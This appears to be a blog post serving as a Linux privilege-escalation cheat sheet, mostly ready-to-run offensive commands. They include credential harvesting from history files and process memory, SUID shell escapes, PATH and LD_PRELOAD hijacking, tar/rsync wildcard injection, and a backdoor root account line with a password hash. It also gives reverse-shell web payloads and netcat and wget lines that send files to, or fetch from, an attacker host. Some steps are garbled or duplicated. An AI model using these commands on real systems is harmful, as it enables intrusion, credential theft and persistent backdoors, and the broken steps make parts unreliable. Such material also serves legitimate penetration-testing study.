Privilege Escalation - Linux
Privilege escalation or vertical privilege escalation means elevating access from a limited user by abusing misconfigurations, design flaws, and features within the windows operating system.
OS System
- File System Layout Reference: https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard
- Command: cat /proc/version; uname -a; uname -mrs;rpm -q kernel;dmesg | grep Linux; ls /boot | grep vmlinuz-
- Info: Prints out kernel information
- Info: After identifying kernel version and OS version use searchsploit to find available exploits
- Command: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /tmp/exploit_suggester.sh
- Info: linux-exploit-suggester.sh is a script that can automate the process of identifying available exploits
- Compiling Exploits
- Command: gcc file.c -o file -static
- Info: You can compile things statically (all dependencies/libraries are within the file) with gcc file.c -o file -static
- Command: gcc -fPIC -shared -o lib.so lib.c -nostartfiles
- Info: Compiles an independent positioned shared library
- Reference: https://developers.redhat.com/blog/2018/03/21/compiler-and-linker-flags-gcc/
- Reference: Compiling DitryCow and making it stable, DirtyCow https://github.com/cheetz/dirtycow/blob/master/THP-Lab
- Command: hostname
- Command: dnsdomainname
- Command: ifconfig -a
- Info: List all networking interfaces
- Command: arp -e
- Command: /sbin/route -nee
- Info: Print ARP cache / IP Cache
- Command: iptables -L
- Command: netstat -antu
- Info: Print Listening TCP Connections
- Command: netstat -anu
- Info: Print Listening UDP Connections
- Command: route
- Info: Print Network Routing Information
- Command: cat /etc/sysconfig/network /etc/networks /etc/sysconfig/dhcpd /etc/dhcp/dhcpd.conf /etc/resolv.conf
- Command: find -name ".htaccess" | xargs -r cat
- Command: find -name ".htpasswd" | xargs -r cat
- Command: mount; df -h; cat /etc/fstab
- Info: list mounted file systems, if we find one we mount it and start the priv-esc process over again.
- Networking Pilfering
- Info: Script Scan for open ports on host
- Command: for port in {1..65535}; do (echo > /dev/tcp/<enter ip>/$port) >& /dev/null && echo "Port $port seems to be open";done
- Command: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
- Info: Attempt if tcpdump is possible
- Port Forwarding
- Command: ssh -L <bind-port>:127.0.0.1:<port-forward> root@attacker-ip
- Info: On the target machine execute command to bind port to attacker
- Command: ssh -R <bind-port>:127.0.0.1:<port-forward> root@attacker-ip
- Reference: https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/localport-forward/
- Command: mknod backpipe p ; nc -l -p <bind-port> < backpipe | nc <attacker-ip> <port-forward >backpipe
- Command: mknod backpipe p ; nc -l -p <bind-port> 0 & < backpipe | tee -a inflow | nc localhost <port-forward> | tee -a outflow 1>backpipe
- Command: mknod backpipe p ; nc -l -p <bind-port> 0 & < backpipe | tee -a inflow | nc localhost <prot-forward> | tee -a outflow & 1>backpipe
- Tunneling
- Command: sshuttle -r username@<target-ip> <broadcast-address on target network>.0/24
- Command: sshuttle --dns -vvr username@<target-ip>0/0
- Reference: sshuttle can be used to tunnel over ssh and dns, easy to use tool https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/sshuttle/
- Command: ssh -D 127.0.0.1:9050 -N [root]@[attacker-ip]
- Info: On target run command to listen to port 9050
- Reference: https://github.com/rofl0r/proxychains-ng
- Reference: https://artkond.com/2017/03/23/pivoting-guide/
- Establishing Remote Shell
- Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- Reference: https://highon.coffee/blog/reverse-shell-cheat-sheet/
- File Transfer
- Command: find / -name wget
- Command: find / -name netcat*
- Command: find / -name tftp*
- Command: find / -name ftp
- Command: echo $(wget https://ATTACKER_IP/file) >> ~/tmp/file
- Command: curl http://attacker-ip/file > file
- Command# nc -w 10 <destination_ip> <port> < <file>
- Command# nc -lvp <port> > <flle>
- Info: Send file to and receive file
- Command: whoami
- Command: sudo -l
- Info: List Sudoers with command privileges
- Command: groups
- Info: Prints assigned groups
- Command: w
- Info: List other logged on users
- Command: last
- Info: Prints last logged on users
- Command: cat /etc/passwd | cut -d: -f1
- Info: List Users and SIDs
- Command: awk -F: '($3 == "0") {print}' /etc/passwd
- Command: List Super Users
- Command: id
- Info: Print User ID
- Info: Cool trick create a user matching there id using useradd -u <userid> <user>
- Command: find / -perm -u=s -type f | xargs -r ls -la
- Command: cat /etc/profile /etc/bashrc ~/.bash_profile ~/.bashrc ~/.bash_logout
- Command: env
- Command: set
- Info: Prints User Environment Variables Configured On System
- Info Run command as another user
- Command: sudo -u <username>
- Understanding Hash Formats
- Reference: https://www.aychedee.com/2012/03/14/etc_shadow-password-hash-formats/
- $1$ = md5
- $2a$ = Blowfish
- $2y$ = Blowfish, with correct handling of 8 bit characters
- $5$ = sha256
- $6$ = sha512
- Search For Creds On File System
- Command: ./LinEnum.sh -t -k password
- Info: LinEnum is a script designed to help identify weakness within linux system that can be used to gain privilege escalation
- Reference: https://github.com/rebootuser/LinEnum
- Command: cat ~/.*_history
- Command: cat /etc/pam.d/system-auth
- Info: Check if Password Lockout Policy Set
- Command: cat /var/apache2/config.inc /var/lib/mysql/mysql/user.MYD /root/anaconda-ks.cfg
- Info: Creds Stored in Scripts/Database files
- Command: cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
- Info: Use grep -i to search for specific strings "passw" "user"
- Command: find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
- Info: Creds stored on a Joomal CMS Server
- Command: cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
- Info: Creds possible stored in mail
- Command: ls -al ~/.ssh/authorized_keys
- Command: ls -al /etc/ssh/
- Info: Check to see if SSH authorized keys are available
- Info: Use ssh -i <cert> host to authenticate ssh with cert
- Creds Stored in Memory
- Command: ps -ef
- Info: List Process and look for Session oriented Services, such as ssh or ftp, and make note of its pid
- Command: gdb -p <pid of service>
- Info: Launch gdb and attach it to the specified pid
- Command: gdb> info proc mappings
- Info: Prints mapped address make note of the start and end address from [HEAP]
- Command: dump memory /tmp/mem [start-address] [end-address]
- Info: Dump the memory contents and use strings to parser the memory dump file
Hacking The File System
- Search for World Writable Directories Or Files
- Command: find / -writable -type d 2>/dev/null
- Info: Checks world-writeable folders
- Command: find / -perm -222 -type d 2>/dev/null
- Info: Checks world-writeable folders
- Command: find / -perm -o w -type d 2>/dev/null
- Info: Checks world-writeable folders
- Command: find / -perm -o x -type d 2>/dev/null
- Info: Checks world-executable folders
- Command: find \( -perm -o w -perm -o x \) -type d 2>/dev/null
- Info: Checks world-writeable & executable folders
- Command: find / -xdev -type \( -perm -0002 -a ! -perm -1000 \) -print
- Info: Checks world-writeable files
- Command: find /dir -xdev \( -nouser -o -nogroup \) -print
- Info: Checks Noowner files
- Search For SUID Binaries
- Command: find / -user root -perm -4000 -print 2>/dev/null
- Command: find / -perm -u=s -type f 2>/dev/null
- Command: find / -user root -perm -4000 -exec ls -ldb {} \;
- Info: Common SUID Binaries that can be used to escalate to root
- Info: In addition these commands can be used to escape restricted shell
- Info: AWK
- Command: awk 'BEGIN {system("/bin/bash")}'
- Info: bash can be used to execute shell
- Command: bash -p
- Info: NMAP
- Command: echo "os.execute('/bin/bash')" > x.nse
- Command: nmap -script=x.nse
- Command: nmap -V ( Version 4.53)
- Command: nmap --interactive
- Command: from nmap interactive menu execute !sh
- Info: FIND
- Command: find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
- Info: LESS
- Command: less /etc/shadow
- Info: After reading a file using less execute !/bin/bash
- Info: MORE
- Command: more /etc/shadow
- Info: After reading a file using more execute !/bin/bash
- Info: MAN
- Command: man ping
- Command: After read the manual of a command execute !/bin/bash
- Info: VI
- Command: vim /etc/passwd
- Info: After opening the vim editor execute shift + : then enter !/bin/bash
- Info: ECHO can be used to execute shell
- Command: echo os.system('/bin/bash')
- Info: SH
- Command: /bin/sh -i
- Info: Python
- Command: python -c "import pty;pty.spawn('/bin/bash');"
- Info: Ruby
- Command: echo "exec '/bin/bash';" > /tmp/root.rb
- Command: ruby /tmp/root.rb
- Info: PERL
- Command: echo "exec '/bin/bash';" > /tmp/root.pl
- Command: perl /tmp/root.pl
- Command: perl —e 'exec "/bin/bash";'
- Info: LUA
- Command: echo "os.execute('/bin/bash')" > /tmp/root.lua
- Command: lua /tmp/root.lua
- Info: TCPDUMP
- Command: echo $'id\n /bin/bash' > /tmp/.shell
- Command: chmod +x /tmp/.shell
- Command: sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root
- Info: BUSYBOX
- Command: /bin/busybox telnetd -|/bin/bash -p9999
- Info: NANO
- Command: nano /etc/passwd
- Info: Add the following line to create a backdoor account with root privs: backdoor:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
- Info: This creates a user Backdoor and password test
- Info: CP
- Command: cp /etc/shadow /etc/shadow.bak
- Command: cp -rf shadow /etc/shadow
- Info: cp -rf can be used to overwrite files (create a spoofed shadow file)
- Info: HT
- Info: ht is a hex editor that can be used to modify files such as /etc/sudeors
- Reference: http://hte.sourceforge.net/readme.html
- Reference: http://theevilbit.blogspot.com/2013/11/kioptrix-level-3-walkthrough.html
- Info: MV
- Command: mv /etc/shadow /etc/shadow.bak
- Command: mv shadow /etc/shadow
- Info: mv can be used to overwrite files (create a spoofed shadow file)4
- Info: NC
- Command: nc -lvp 80 > server_passwd
- Command: wget 127.0.0.1 –post-file /etc/passwd
- Info: MOUNT
- Command: mount -o bind /bin/bash /bin/mount
- Command: mount
- Reference: https://gtfobins.github.io/
- Info: GTFOBINS provides a list of linux programs that can be used for PrvEsc
- Hijacking Installed Programs
- Leveraging Symlinks
- Info: Symlinks can be used to obtain access to restricted files, or execute arbitrary code
- Command: To create a symlink execute, ln -s <path-to-file> <file>
- Command: To create a symlink in php execute, symlink(“/”, “./symroot”);
- Hijack setuid binary
- function <path-to-setuid-program> () { /bin/bash; }
- export -f <path-to-setuid-program>
- execute setuid program
- Poising PATH
- Info: adding a . in the path variable causes programs to execute arbitrary code
- Info: To do this one needs to spoof a binary and cause an elevated user to run that spoofed binary, such as ls
- Command: echo "/bin/bash" > ls
- Command: chmod +x ls
- Command: export PATH=.:$PATH
- Info: Once ls is executed by an elevated user account bash will be called
- Info: After setting the path directory, may need to reset it
- Command: Execute export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- Command: export TERM=xterm
Command: export SHELL=bash - Control Execution Flow
- Info: If a script or program is calling another binary, we can hijack its path to execute an arbitrary command
- Command: cd /tmp
- Command: echo "/bin/bash" > <name-of-program>
- Command: chmod +x <name-of-program>
- Command: export PATH=/tmp:$PATH
- Command: navigate back to the script or program and execute it
- LD_PRELOAD Injection
- Reference: get root payload, https://goo.gl/5Ztwtj
- Command: compile payload, gcc -fPIC -shared -o /tmp/root.so root.c -nostartfiles
- Command: Launch, LD_PRELOAD=/tmp/root.so apache2 <run any available setuid binary>
- Shared Library DLL Injection:
- Info: Trace a suid binary to identify missing library
- Command: strace /usr/local/bin/<suid binar> 2>&1 | grep -i -E "open|access|no such file"
- Info: If a shared library is missing compile a impersonated payload
- Reference: Shared library payload, https://goo.gl/wMeAhV
- Command: Compile payload, gcc -shared -o <path-to-missing-library> -fPIC <path-to-payload.c>
- Abusing Wildcard (*)
- Info: Look for scripts that contain the following commands:
- Chown
- Chmod
- Tar
- Rsync
- Info: Good place cat /etc/crontab
- Chown file reference trick (file owner hijacking)
- Info: create a file and assign ownership to it
- Command: touch hijack && chown user user hijack.php
- Info: create a second file as --reference=.hijack.php
- Command: touch --reference=.hijack.php
- Chmod file reference trick
- Info: create a file and assign ownership to it
- Command: touch hijack && chown user user hijack.php
- Info: create a second file as --reference=.hijack.php
- Command: touch ./--reference=.hijack.php
- Tar arbitrary command execution
- Command: echo "cp /bin/bash /tmp/bash && chmod +s /tmp/bash" > shell.sh
- Command: echo "" > "--checkpoint-action=exec=sh shell.sh"
- Command: echo "" > --checkpoint=1
- Command: tar cf archive.tar *
- Rsync arbitrary command execution
- Command: touch ./'-e sh shell.c'
- Command: echo "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" >> shell.c && chmod +x shell.c
- Attacking Processes And Services
- Command: ps aux | grep root
- Info: List running process running as root
- Command: ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archivesO; ls -alh /var/cache/yum/
- Info: Locate applications that are installed
- Command: pkg_info
- Info: Obtain Application Version Information on OpenBSD, FreeBSD
- Command: dpkg -I
- Info: Obtain Application Version information on Debian
- Command: rpm -qa
- Info: Obtain Application Version information on CentOS, OpenSuse, Fedora, RHEL
- Command: find / -name wget; find / -name nc*; find / -name netcat*; find / -name tftp*; find / -name ftp; find / -name tcpdump
- Info: Find Interesting programs
- Command: service --status-all
- Info: List running services
- Enumerate Service Logs
- Command: cat /etc/httpd/logs/access_log /var/log/httpd/error.log /var/log/apache2/access_log /var/log/apache2/error_log /var/log/apache/access_log /var/log/auth.log /var/log/chttp.log /var/log/cups/error_log /var/log/dpkg.log /var/log/faillog /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/messages /var/log/secure /var/log/syslog /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/run/utmp /var/webmin/miniserv.log /var/www/logs/access_log
- Command: ls -alh /var/lib/dhcp3/
- Command: ls -alh /var/log/postgresql/
- Command: ls -alh /var/log/proftpd/
- Command: ls -alh /var/log/samba/
- Known Vulnerable Servces
- Info: Exim 4.84-3 and lower is vulnerable to local privilege exploit
- Reference: https://www.exploit-db.com/exploits/39535/
- Command: cat /etc/syslog.conf /etc/chttp.conf /etc/lighttpd.conf /etc/cups/cupsd.conf /etc/inetd.conf /etc/apache2/apache2.conf /etc/my.conf /etc/httpd/conf/httpd.conf /opt/lampp/etc/httpd.conf
- Info: List Service Configurations to parse for vulnerabilities
- Info: CoreHTTP configuration
- Reference: https://www.exploit-db.com/exploits/10610/
- Command: index.pl?page=`mknod backpipe p && nc <attacker-ipaddress> <listening-port> 0<backpipe | /bin/bash 1>backpipe&`
- Info: URL encode the string above to send a request to the CoreHTTP Server
- Info: LightHTTPd Web Server
- Reference: https://www.exploit-db.com/exploits/4391/
- Command: wget --referer="<?php system('/bin/bash -i > /dev/tcp/<attacker-ip>/<listening-port> 0<&1 2>&1'); ?>" localhost
- Info: CUPS, Configures CUPS Printing Server's scheduler
- Reference:https://www.exploit-db.com/exploits/41233/
- Info: inetd.conf will load a network program based upon a request from the network - Check for vulnerabilties
- Reference: https://docs.oracle.com/cd/E19253-01/816-5174/inetd.conf-4/index.html
- Info: inetd.conf can possible result in a race condition, inetd responsible to close and open sockets/ports, however there are times when sockets are closed however ports can be left open allowing ports to bind to new connections
- Command: cat /var/log/apache2/access.log
- Info: Contains Web Client Access connections to Ubuntu Apache Web Servers
- Command: cat /var/log/httpd/access_log
- Info: Contains Web Client Access connections to RHEL Web Servers
- Command: cat /etc/my.conf
- Info: MySQL Configuration File
- Command: cat /etc/httpd/conf/httpd.conf
- Info: Apache HTTP Service Configuration File
- Command: cat /opt/lampp/etc/httpd.conf
- Info: LAMP HTTP Service Configuration
- Command: ls -alhR /var/www/
- Command: ls -alhR /srv/www/htdocs/
- Command: ls -alhR /usr/local/www/apache22/data/
- Command: ls -alhR /opt/lampp/htdocs/
- Command: ls -alhR /var/www/html/
- Known Vulnerable Services
- SMB (SambaCry) versions:
- 3.5.0 - 4.x
- 4.x - 4.4.14
- 4.5.x - 4.5.9
- Reference: https://github.com/opsxcq/exploit-CVE-2017-7494
- MySQL Service (using a limited user)
- Command: select sys_exec('whoami');
- Info: Check if running as root
- Info: From limited user create the following getsystem.c program in tmp directory
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int
main(
void
)
{
setuid(0); setgid(0);
system
(“/bin/bash”);
}
- Command:gcc -o /tmp/shell /home/<user>/shell.c
- Info: Compile the shell.c program
- Command: mysql> select sys_exec('chmod +s /tmp/shell');
- Info: using MySQL SetBit the shell payload to escalate as root
- NFS
- Command:cat /etc/exports
- Info: Look for (rw,sync,no_root_squash)
- Info: If no_root_squash tag is available we can escalate privs.
- Use nfsshell and follow https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/
- Info: On Attacker System execute:
- Command: mkdir /tmp/victim
- Command: mount -o rw, vers=2 target-ip:/tmp/victim
- Command: echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/victim
- Command: chmod +s /tmp/victim
TIPS
Recovering Deleted Files
Command: sudo grep -i -a -B100 -A100 'string' /dev/sda1 > file.txt
Replace /dev/sda1 with the device that the file was on and replace 'string' with the unique string in your file. This could take some time. But basically, what this does is it searches for the string on the device and then returns 100 lines before and after that line and puts it in file.txt. If you need more lines returned just adjust the -B and -A options as appropriate. You might get a bunch of extra garbage returned, but you should be able to get your text back.
Recovering Deleted Files
Command: sudo grep -i -a -B100 -A100 'string' /dev/sda1 > file.txt
Replace /dev/sda1 with the device that the file was on and replace 'string' with the unique string in your file. This could take some time. But basically, what this does is it searches for the string on the device and then returns 100 lines before and after that line and puts it in file.txt. If you need more lines returned just adjust the -B and -A options as appropriate. You might get a bunch of extra garbage returned, but you should be able to get your text back.
Automation Tools
LinEnum
http://www.rebootuser.com/?p=1758
This tool is great at running through a heap of things you should check on a Linux system in the post exploit process. This include file permissions, cron jobs if visible, weak credentials etc. The first thing I run on a newly compromised system.
LinuxPrivChecker
http://www.securitysift.com/download/linuxprivchecker.py
This is a great tool for once again checking a lot of standard things like file permissions etc. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the script. This is a great starting point for escalation.
Resources
https://www.rebootuser.com/?p=1623
https://github.com/Shiva108/CTF-notes/blob/master/Kali%20Linux%20Offensive%20Security%20Certified%20Professional%20Playbook.html
http://pwnwiki.io/#!index.md
https://github.com/Shiva108/CTF-notes/blob/master/dostoevsky-pentest-notes-master/chapter-5.md
https://guif.re/linuxeop
LinEnum
http://www.rebootuser.com/?p=1758
This tool is great at running through a heap of things you should check on a Linux system in the post exploit process. This include file permissions, cron jobs if visible, weak credentials etc. The first thing I run on a newly compromised system.
LinuxPrivChecker
http://www.securitysift.com/download/linuxprivchecker.py
This is a great tool for once again checking a lot of standard things like file permissions etc. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the script. This is a great starting point for escalation.
Resources
https://www.rebootuser.com/?p=1623
https://github.com/Shiva108/CTF-notes/blob/master/Kali%20Linux%20Offensive%20Security%20Certified%20Professional%20Playbook.html
http://pwnwiki.io/#!index.md
https://github.com/Shiva108/CTF-notes/blob/master/dostoevsky-pentest-notes-master/chapter-5.md
https://guif.re/linuxeop
No comments:
Post a Comment